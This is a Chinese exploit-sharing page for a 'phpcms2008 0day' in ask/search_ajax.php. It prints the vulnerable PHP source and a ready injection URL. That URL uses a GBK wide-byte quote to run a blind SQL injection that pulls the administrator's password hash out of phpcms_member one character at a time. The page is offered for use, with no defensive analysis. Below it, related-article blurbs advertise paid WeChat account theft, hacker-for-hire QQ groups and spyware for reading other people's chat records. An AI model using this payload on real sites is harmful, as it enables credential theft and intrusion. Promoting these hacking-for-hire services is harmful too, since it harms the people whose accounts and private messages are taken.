phpcms2008-0day ask/search_ajax.php
受影响程序: phpcms2008 gbk
漏洞文件:ask/search_ajax.php
code:
<?php
require './include/common.inc.php';
require_once MOD_ROOT.'include/ask.class.php';
$ask = new ask();
header('Content-type: text/html; charset=utf-8');
if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q);
if($q)
{
$where = " title LIKE '%$q%' AND status = 5";
}
else
{
exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);
foreach($infos as $key=>$val)
{
$val['title'] = str_replace($q, '<span class="3865-e914-4411-4b16 c_orange">'.$q.'</span>', $val['title']);
$info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];
$info[$key]['url'] = $val['url'];
}
echo(json_encode($info));
?>
测试 *** :
ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
相关文章
WP GDPR Compliance插件权限提升漏洞_两人
WordPress一个非常流行的插件WP GDPR Compliance 被发现存在权限提升漏洞,该插件的安装量大约为10万。漏洞允许未授权的攻击者进行权限提升,以进一步入侵有漏洞的站点。研究人员建议...
资深黑客教你3分钟盗微信号技术?一流黑客盗微信号要多少钱一个(二)
找到黑客帮助窃取微信号要花多少钱?黑客教你如何在3分钟/1分钟内窃取微信号。他们专门窃取微信密码、查房、通话记录和聊天记录。他们非常可靠!如果你失去了任何人都不要紧,因为未来会有很多人和你在一起。当真...
全国30多万台手机被 控制!手机没出厂就被装了木马_腾讯安全
有一批人,他们掌握着超高的计算机技术 对互联网知识了如指掌 他们有可能会维护我们的网络安全 当然也有可能严重威胁网络安全 这类人,我们就称之为黑客!...
获取别人的微信聊天记录_获取别人手机通讯录木马
获取别人的微信聊天记录_获取别人手机通讯录木马 今天小编的网站突然打开缓慢,检查发现服务器正在进行高速内网传输数据且网站打开缓慢!如下图: 本来小编以为受到了攻击导致服务器信息泄露,赶...
查住宿信息怎么查_查住宿信息QQ
查住宿信息怎么查_查住宿信息QQ 三星反垄断调查取得重大进展。今年上半年,中国反垄断执法机构启动了对三星、镁光、海力士等公司的反垄断调查,主要是存储芯片价格异常上涨。日前,这一系列调查有了重要进展。...
黑客追款接单QQ_24小时接单的黑客QQ群
黑客追款接单QQ_24小时接单的黑客QQ群 耀耀耀 切克闹 机械键盘来一套,机械师机械键盘首发终于忙完了;今天小编再给大家带来一篇日常使用笔记本电脑的小技巧—系统密码清除。...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!